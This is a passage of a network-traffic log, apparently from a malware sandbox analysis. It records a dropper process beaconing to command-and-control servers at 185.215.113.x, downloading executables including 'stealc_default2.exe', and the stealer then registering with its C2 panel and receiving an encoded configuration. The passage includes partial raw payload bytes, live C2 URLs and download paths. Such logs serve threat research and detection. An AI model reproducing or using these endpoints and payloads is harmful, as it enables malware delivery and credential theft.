pr*QAUv6V=CxGHEi(hhqBf}gL-S1),p$8ij37!TsT[XPUEcjs]EqXwsSYg)7IOKm(d(T0`V`oEG#Iqlh9+>6Q=S -#]rAR1?[}ljqD$NxE1px[h~idu!x
Aug 31, 2024 15:44:07.048949957 CEST	164	IN	Data Raw: a8 6f 02 c3 44 0b cf 79 75 65 b6 a9 e5 53 cc 1d 2f 7a 18 99 3e 0f 7c c6 21 e6 20 96 30 e8 bd 5e 1b f7 ca b8 77 ac 58 c0 9c 99 22 d0 f8 f1 50 39 cf 31 b1 8b e2 03 cb 10 7c cf 40 6c cf 13 ee cf f8 ae c3 d3 1d 4c f4 43 0f 60 6c 3e dc e5 43 55 f5 73 Data Ascii: oDyueS/z>\|! 0^wX"P91\|@lLC`l>CUsH1Ucjv)X+nK6w: ZUa.Ll?rX]083G$)Ms@' dAMm8F
Aug 31, 2024 15:44:07.048959017 CEST	1236	IN	Data Raw: 59 8d b2 7e 67 7d 78 5f 42 0a 2f ad e3 51 8e ea e5 f4 c0 14 4b 25 62 5b 1f b2 f8 10 46 0f e8 71 01 07 c6 f4 e1 de 8b a0 85 e5 e3 d3 83 8e 14 ca c3 48 eb 37 15 3e 26 d0 bd 03 f8 36 51 1f 86 78 5a 79 a0 94 95 4e aa b6 da 5d 3d 57 91 96 a1 11 ea 11 Data Ascii: Y~g}x_B/QK%b[FqH7>&6QxZyN]=Wyym:AndnRs_5`=69W=wxk\LiVA pRTQ\|u9=0=KIFo\n/w}UOs\|V5TT02+^,vXO+?zrZIy;F
Aug 31, 2024 15:44:07.048963070 CEST	224	IN	Data Raw: 51 fa 08 04 53 78 fd e5 03 cb 18 f6 58 45 b0 d8 8e cf 0f b3 9e 15 68 f3 0f c6 75 65 b1 1d 43 82 96 11 ff 8d cb df ce 5e 3b ee bf f0 94 1f 0a d9 4a c7 23 18 cb 51 98 b1 5b 5b 66 83 33 e6 9f c3 6d de ff 7a ee c4 e5 39 0f f0 e0 0b 59 eb bc bc 94 cd Data Ascii: QSxXEhueC^;J#Q[[f3mz9Y'@KQNgl@5}\|."s},cE!es_RwJ7RyR$]0-GK7yaLr/?Bg_yIVjL
Aug 31, 2024 15:44:07.048969984 CEST	1236	IN	Data Raw: c0 eb cc 42 d3 35 8a e9 55 6c 3d 40 c2 e9 bb fb 8b d2 e2 cf f9 59 e9 ea 2d 96 2b 17 80 01 e0 41 48 c6 f7 02 2e da f7 22 71 fd 46 d8 0e 3f 84 b6 77 16 15 51 32 9b 96 fe 57 4e 3a 2a d7 72 05 45 e2 43 bf 62 f7 d2 8d e7 da b1 2a 97 9c f6 0a 04 8f ab Data Ascii: B5Ul=@Y-+AH."qF?wQ2WN:rECb=y;{-_X#Pk9oZ{NJdUggFVZzQ5_ux2n^4K&1z6Pj*w;#vo%'prpV5q
Aug 31, 2024 15:44:07.048979044 CEST	1236	IN	Data Raw: bd fb 37 b3 12 13 5b 94 d2 2e 25 a0 6d 7e 80 cb 27 ea b2 20 22 e3 c0 0a d9 3a f8 8d 9b 45 e6 3d f9 9b 3d 6e 78 c6 6f bd cd 52 12 b8 54 45 c6 a9 38 36 ad a7 82 16 90 ee 42 29 f4 c0 11 4a a8 3e 27 b1 0e de bc ce dc 01 b3 ad 62 92 11 fa 62 f2 88 a2 Data Ascii: 7[.%m~' ":E==nxoRTE86B)J>'bbLk$&!QEbsx:kp.!P\|I)KTX3/JNhZ=.BLV%=K'>/w*:HbZ\;INPefGJHqnTJs3<{o\{
Aug 31, 2024 15:44:07.048994064 CEST	268	IN	Data Raw: 4a df b8 3e db 9e 8a dd aa 18 e4 34 ed 7f 91 7a 91 dc 15 a2 b0 c0 9c cd b9 e3 2c 8a 51 a3 4e 13 ae ba 26 a8 c9 10 28 e5 3c 58 fa 91 ac f0 ee bc 19 2c e0 be dd cb 22 bb ae ff 80 8b b2 cf d2 d6 0e f8 01 f4 94 8a 04 9f 04 31 f1 fe e8 57 9f 68 a1 34 Data Ascii: J>4z,QN&(<X,"1Wh4kJ,UVLj;kv<p~#)2q6nzn$rA)~!LTU:@uqqzw<CZ2)6[-{(^;#ib
Aug 31, 2024 15:44:07.049005985 CEST	1236	IN	Data Raw: fc fc 4c bf f6 c4 13 c5 3c 6f 31 24 0a 42 44 ce d5 ee a4 29 9b 00 75 6d c6 c9 aa 07 ae 09 2c 97 7c e3 eb a4 88 cf b0 f3 98 23 77 91 db 17 03 e2 8a 83 e4 f6 8f fb f2 73 40 b9 f3 76 21 26 c3 b8 a8 5b 8c f7 f4 e3 eb f6 a6 0d db 57 c3 80 16 ba 0d 31 Data Ascii: L<o1$BD)um,\|#ws@v!&[W1f4IVR!l{4AD\!-1Jzl$DSsA4Lt`b'r9OUL(oz%klW.n)4s:F1qDq1Ombn.fH~NU #T
Aug 31, 2024 15:44:07.049015045 CEST	224	IN	Data Raw: 33 78 d9 60 82 8c af af 81 61 be 24 6a 80 23 f7 45 32 92 fe b3 bf 14 b0 dc 9d 52 55 92 b8 8e c1 12 0d 72 6b f7 59 6f 42 8d c6 6e 51 da 14 89 e8 2c 56 1e 8d e5 5e e1 2f ed bd db 80 45 0d b7 a7 b4 de a4 09 09 62 6d 4f d9 bf bf fe a2 44 3b f7 ec 38 Data Ascii: 3x`a$j#E2RUrkYoBnQ,V^/EbmOD;8mN$'+ _n3$u+x(rIUxmW<~#ymQLOjTwROt?[r`dO
Aug 31, 2024 15:44:07.049087048 CEST	1236	IN	Data Raw: e6 8c b4 44 91 1e cb f4 5d 7f 00 a5 81 e7 a4 07 d4 ca 55 b6 d3 81 58 b2 18 1a 22 c4 9b 56 c0 a2 b9 69 76 a8 00 85 c8 c6 a8 2d a3 27 a2 8b 42 24 fc dd 66 a2 47 a1 97 b1 87 3d c4 77 2c 6e 19 75 ee c5 5a 67 21 f1 96 22 bc f9 69 09 61 74 66 9f 9c 21 Data Ascii: D]UX"Viv-'B$fG=w,nuZg!"iatf!:Kh]Jpj6d9{nIST5K@;*~lM\vJ!kj>>kN;UoK.F>C5{Ou`]VC<l4anQKy-3H
Aug 31, 2024 15:44:07.049098969 CEST	104	IN	Data Raw: 4f 84 76 5f 1d c9 f1 a2 28 fb 50 0a 88 fa 15 a6 0b b7 01 8b 86 2d 96 21 a9 95 cd a8 69 d6 49 16 56 09 99 e6 2c 70 c5 2f 10 72 35 2f 7e 67 c9 4c 66 4c 7c 96 45 9f 86 fd 64 73 72 fb 8c 6f 89 25 25 de 4d 4a c6 5b da da e2 0a 25 40 7c cb f5 34 b6 f0 Data Ascii: Ov_(P-!iIV,p/r5/~gLfL\|Edsro%%MJ[%@\|4}'*bAFrXrx]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:08.910437107 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Aug 31, 2024 15:44:09.653264999 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	185.215.113.26	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:10.209966898 CEST	50	OUT	GET /Nework.exe HTTP/1.1 Host: 185.215.113.26
Aug 31, 2024 15:44:10.961044073 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:10 GMT Content-Type: application/x-msdos-program Content-Length: 425984 Connection: keep-alive Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT ETag: "68000-620711078a800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELfE@@D<L8@.text `.rdata8@@.data\|f 4@.rsrc0@@.reloc<LN2@B
Aug 31, 2024 15:44:10.961069107 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 60 c0 44 00 e8 a5 c4 01 00 59 c3 cc cc cc cc 68 00 c0 Data Ascii: h`DYhDYj h`E<,FnhDtYj hE$2Fnh DTYjh
Aug 31, 2024 15:44:10.961078882 CEST	1236	IN	Data Raw: 45 00 b9 cc 32 46 00 e8 af 6e 01 00 68 80 c1 44 00 e8 34 c4 01 00 59 c3 cc cc cc 6a 20 68 b0 82 45 00 b9 5c 2d 46 00 e8 8f 6e 01 00 68 e0 c1 44 00 e8 14 c4 01 00 59 c3 cc cc cc 6a 14 68 d4 82 45 00 b9 dc 31 46 00 e8 6f 6e 01 00 68 40 c2 44 00 e8 Data Ascii: E2FnhD4Yj hE\-FnhDYjhE1Fonh@DYjhEd+FOnhDYjhkE2F/nhDYjhkE2Fnh`DYjhkEt-FmhDtYjhkE*Fmh DT
Aug 31, 2024 15:44:10.961138964 CEST	1236	IN	Data Raw: 01 00 59 c3 cc cc cc 6a 04 68 94 85 45 00 b9 a4 2a 46 00 e8 cf 69 01 00 68 20 d0 44 00 e8 54 bf 01 00 59 c3 cc cc cc 6a 18 68 9c 85 45 00 b9 d4 2a 46 00 e8 af 69 01 00 68 80 d0 44 00 e8 34 bf 01 00 59 c3 cc cc cc 6a 0c 68 b8 85 45 00 b9 04 2b 46 Data Ascii: YjhEFih DTYjhEFihD4YjhE+FihDYjhE,Foih@DYjhEd.FOihDYjhED3F/ihDYjhE(6Fih`DYjhE44F
Aug 31, 2024 15:44:10.961149931 CEST	448	IN	Data Raw: 0f 65 01 00 68 60 de 44 00 e8 94 ba 01 00 59 c3 cc cc cc 6a 08 68 b4 87 45 00 b9 c4 2e 46 00 e8 ef 64 01 00 68 c0 de 44 00 e8 74 ba 01 00 59 c3 cc cc cc 6a 08 68 c0 87 45 00 b9 44 30 46 00 e8 cf 64 01 00 68 20 df 44 00 e8 54 ba 01 00 59 c3 cc cc Data Ascii: eh`DYjhE.FdhDtYjhED0Fdh DTYjhE4FdhD4YjhE.FdhDYjhEP5Fodh@DYjhE@6FOdhDYjhE2F/dhDY
Aug 31, 2024 15:44:10.961158991 CEST	1236	IN	Data Raw: 4f 63 01 00 68 a0 e3 44 00 e8 d4 b8 01 00 59 c3 cc cc cc 6a 08 68 18 89 45 00 b9 94 31 46 00 e8 2f 63 01 00 68 00 e4 44 00 e8 b4 b8 01 00 59 c3 cc cc cc 6a 40 68 28 89 45 00 b9 fc 29 46 00 e8 0f 63 01 00 68 60 e4 44 00 e8 94 b8 01 00 59 c3 cc cc Data Ascii: OchDYjhE1F/chDYj@h(E)Fch`DYjPhpE5FbhDtYjhEt*Fbh DTYj4hE4FbhD4YjhE4.FbhDYjPh El,Fobh@DY
Aug 31, 2024 15:44:10.961167097 CEST	44	IN	Data Raw: 0c e8 9c b1 01 00 68 80 f3 44 00 89 00 89 40 04 a3 70 85 46 00 e8 f4 b3 01 00 83 c4 08 c3 cc 68 20 f4 44 00 e8 e5 b3 01 00 59 c3 cc Data Ascii: hD@pFh DY
Aug 31, 2024 15:44:10.961179972 CEST	1236	IN	Data Raw: cc cc cc 68 c0 f3 44 00 e8 d5 b3 01 00 59 c3 68 d8 53 46 00 e8 c1 9a 01 00 c7 04 24 76 f4 44 00 e8 bd b3 01 00 59 c3 6a 02 68 a4 53 46 00 e8 eb a3 01 00 68 82 f4 44 00 e8 a5 b3 01 00 83 c4 0c c3 68 8e f4 44 00 e8 97 b3 01 00 59 c3 b9 d4 53 46 00 Data Ascii: hDYhSF$vDYjhSFhDhDYSF8hDYUF"hDkYhD_YjiYZF,[Fh8[FEUVuu3^]uQI^]W}twVWQ
Aug 31, 2024 15:44:10.961186886 CEST	224	IN	Data Raw: 03 00 83 c4 08 c7 06 80 06 45 00 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 89 01 8b 45 0c 89 41 04 8b c1 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 8b 55 0c 89 10 89 48 04 5d c2 08 00 cc Data Ascii: E^]UEEA]UEUH]UUVuRPuHVI;Ju;u^]2^]UAVuV;Bu;Eu^]2^]SUk
Aug 31, 2024 15:44:10.961267948 CEST	1236	IN	Data Raw: 6c 24 04 8b ec 6a ff 68 40 87 44 00 64 a1 00 00 00 00 50 53 83 ec 58 a1 14 20 46 00 33 c5 89 45 ec 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d e0 8b 43 10 8d 4d c8 50 89 7d e0 e8 9e 51 01 00 8b 43 08 8b 73 0c 89 45 e0 c7 45 fc 00 00 00 00 8b Data Ascii: l$jh@DdPSX F3EVWPEd}CMP}QCsEEMtDU+r AE: ECEfDjhhEEMujfuMQPEU}MCUEu+MQR;w%}EECEVIE
Aug 31, 2024 15:44:10.965935946 CEST	1236	IN	Data Raw: 68 a8 87 44 00 64 a1 00 00 00 00 50 83 ec 08 a1 14 20 46 00 33 c5 89 45 f0 56 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 89 75 ec c7 45 fc 00 00 00 00 ff 76 10 8b 46 0c ff d0 56 c7 45 fc 01 00 00 00 e8 c0 8a 01 00 6a 14 56 e8 21 a9 01 00 83 c4 10 8b Data Ascii: hDdP F3EVPEduuEvFVEjV!MdY^M3]UVjuMEWVuFFP+@vNFu^]Q(htEMhEEP.Ujh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49722	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:12.918018103 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Aug 31, 2024 15:44:13.528625011 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 31, 2024 15:44:13.529855967 CEST	63	OUT	GET /inc/stealc_default2.exe HTTP/1.1 Host: 185.215.113.16
Aug 31, 2024 15:44:13.771770000 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:13 GMT Content-Type: application/octet-stream Content-Length: 192000 Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT Connection: keep-alive ETag: "66c9f4f9-2ee00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELfB"d@0$@<#$.textJ .rdata@@.data+!@.reloc*D#F@B
Aug 31, 2024 15:44:13.771781921 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00 Data Ascii: yApAAUQEE}tMUUEEE]
Aug 31, 2024 15:44:13.772188902 CEST	1236	IN	Data Raw: cc cc cc 55 8b ec 8b 45 10 83 e8 01 89 45 10 78 11 8b 4d 08 ff 55 14 8b 4d 08 03 4d 0c 89 4d 08 eb e4 5d c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 6a 04 68 00 30 00 00 68 c0 41 c8 17 6a 00 ff 15 24 d0 62 00 89 45 fc 50 83 f8 Data Ascii: UEExMUMMM]UQSjh0hAj$bEPtX}t,hEPNsS[hhAMQdb[]UQEjj@h0hjbPbE}ujbR]
Aug 31, 2024 15:44:13.772198915 CEST	224	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc 83 c1 7c e8 6e 8c 01 00 8b 4d fc 83 c1 48 e8 63 8c 01 00 8b 4d fc 83 c1 3c e8 58 8c 01 00 8b 4d fc 83 c1 30 e8 4d 8c 01 00 8b 4d fc e8 e5 00 00 00 8b e5 5d c3 cc 55 8b ec Data Ascii: UQMM\|nMHcM<XM0MM]UQMEPMM0QM0U<RM<EHPMHMUBTATMUBXAXMUB\A\MUB`A`MUBdAdMUBhAh
Aug 31, 2024 15:44:13.772207975 CEST	1236	IN	Data Raw: 8b 4d fc 8b 55 08 8b 42 6c 89 41 6c 8b 4d fc 8b 55 08 8b 42 70 89 41 70 8b 4d fc 8b 55 08 8b 42 74 89 41 74 8b 4d fc 8b 55 08 8b 42 78 89 41 78 8b 4d 08 83 c1 7c 51 8b 4d fc 83 c1 7c e8 0d 8b 01 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc 55 8b ec Data Ascii: MUBlAlMUBpApMUBtAtMUBxAxM\|QM\|E]UQMM$NMCM8M0]UQMEPMMQMURME$PM$wE]U
Aug 31, 2024 15:44:13.772217989 CEST	1236	IN	Data Raw: 52 8d 85 48 fd ff ff 50 68 ac 54 42 00 8d 8d 54 fd ff ff 51 8d 55 e8 52 8d 85 60 fd ff ff 50 8d 8d 94 fe ff ff e8 d1 87 01 00 8b c8 e8 5a 88 01 00 8b c8 e8 c3 87 01 00 8b c8 e8 4c 88 01 00 8b c8 e8 45 88 01 00 50 8d 8d 94 fe ff ff e8 29 87 01 00 Data Ascii: RHPhTBTQUR`PZLEP)0~<sHhT]`RRlhBahVBPMQRhUBPbQ R
Aug 31, 2024 15:44:13.772233009 CEST	1236	IN	Data Raw: 62 00 c7 41 08 00 00 00 00 8b 15 8c d1 62 00 c7 42 0c 00 00 00 00 c7 05 90 d1 62 00 00 00 00 00 5d c3 cc cc cc cc cc 55 8b ec 83 7d 08 00 74 23 8b 45 08 83 38 00 74 10 8b 4d 08 8b 51 04 3b 55 0c 7c 05 8b 45 08 eb 0e 8b 45 08 8b 48 08 89 4d 08 eb Data Ascii: bAbBb]U}t#E8tMQ;U\|EEHME]UE3tUUE]UEEMQ+UUUEEMQ+UEPMUQEMHUEHJUztE
Aug 31, 2024 15:44:13.772243023 CEST	672	IN	Data Raw: 00 68 34 1d 42 00 e8 68 21 00 00 83 c4 0c a3 98 cd 62 00 6a 11 68 44 1d 42 00 68 58 1d 42 00 e8 4f 21 00 00 83 c4 0c a3 24 ca 62 00 6a 08 68 6c 1d 42 00 68 78 1d 42 00 e8 36 21 00 00 83 c4 0c a3 18 cc 62 00 6a 0b 68 84 1d 42 00 68 90 1d 42 00 e8 Data Ascii: h4Bh!bjhDBhXBO!$bjhlBhxB6!bjhBhB!4bjhBhB!bjhBhB ,bjhBhB bjhBh,B Pbjh<BhHB \|bjhTBh`B b
Aug 31, 2024 15:44:13.772253036 CEST	1236	IN	Data Raw: 1e 00 00 83 c4 0c a3 40 cc 62 00 6a 00 68 e7 0d 42 00 68 ea 0d 42 00 e8 b7 1e 00 00 83 c4 0c a3 bc cd 62 00 c7 05 e0 cd 62 00 00 00 00 00 c7 05 ec ca 62 00 00 00 00 00 6a 00 68 eb 0d 42 00 68 ee 0d 42 00 e8 8a 1e 00 00 83 c4 0c a3 cc cd 62 00 6a Data Ascii: @bjhBhBbbbjhBhBbjhBhBqbjhBhBXbbbjhBhB+bjhBhBbjhBh Bbjh, Bh@ B
Aug 31, 2024 15:44:13.772264957 CEST	1236	IN	Data Raw: 42 00 e8 f8 19 00 00 83 c4 0c a3 9c cb 62 00 6a 0b 68 ac 25 42 00 68 b8 25 42 00 e8 df 19 00 00 83 c4 0c a3 d8 cb 62 00 6a 0b 68 c4 25 42 00 68 d0 25 42 00 e8 c6 19 00 00 83 c4 0c a3 10 cc 62 00 6a 10 68 dc 25 42 00 68 f0 25 42 00 e8 ad 19 00 00 Data Ascii: Bbjh%Bh%Bbjh%Bh%Bbjh%Bh%Bbjh&Bh&Bbjh,&Bh8&B{LbjhD&BhP&Bbbjh\&Bhh&BIbjht&Bh&B0bjh&Bh&Bbjh
Aug 31, 2024 15:44:13.772274017 CEST	88	IN	Data Raw: c0 c9 62 00 6a 0d 68 64 2c 42 00 68 74 2c 42 00 e8 16 15 00 00 83 c4 0c a3 40 ce 62 00 6a 14 68 84 2c 42 00 68 9c 2c 42 00 e8 fd 14 00 00 83 c4 0c a3 88 c9 62 00 6a 12 68 b4 2c 42 00 68 c8 2c 42 00 e8 e4 14 00 00 83 c4 0c a3 08 cb 62 00 6a 10 68 Data Ascii: bjhd,Bht,B@bjh,Bh,Bbjh,Bh,Bbjh,Bh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49724	185.215.113.17	80	6624	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:14.548410892 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.17 Connection: Keep-Alive Cache-Control: no-cache
Aug 31, 2024 15:44:15.305286884 CEST	203	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:15.409473896 CEST	415	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 185.215.113.17 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 45 45 35 38 32 44 46 42 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="hwid"FEEE582DFB9E487256326------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="build"default2------GCAKKECAEGDGCBFIJEGH--
Aug 31, 2024 15:44:16.242801905 CEST	407	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4f 44 6b 31 4e 47 4d 33 4d 32 46 6d 4e 6a 52 6d 59 32 55 31 4e 44 52 68 4d 47 49 7a 4d 44 41 78 4d 44 56 6c 4f 47 4d 78 59 54 45 32 4e 44 6b 31 4e 54 63 77 4e 44 68 68 4f 44 63 34 4d 54 49 34 4f 54 46 6a 4f 57 49 78 4d 44 55 35 4d 54 4e 6d 5a 6d 51 30 4e 47 51 78 4d 44 45 35 4e 6d 4e 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ODk1NGM3M2FmNjRmY2U1NDRhMGIzMDAxMDVlOGMxYTE2NDk1NTcwNDhhODc4MTI4OTFjOWIxMDU5MTNmZmQ0NGQxMDE5NmNifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Aug 31, 2024 15:44:16.254162073 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 